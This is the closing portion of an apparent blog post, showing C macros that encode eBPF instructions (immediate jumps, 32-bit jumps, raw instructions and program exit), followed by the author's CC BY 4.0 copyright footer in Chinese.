#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })

/* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. */

#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP32 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })

/* Raw code statement block */

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
((struct bpf_insn) { \
.code = CODE, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = IMM })

/* Program exit */

#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })

#endif


文章作者: q1ming
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 q1ming !
  目录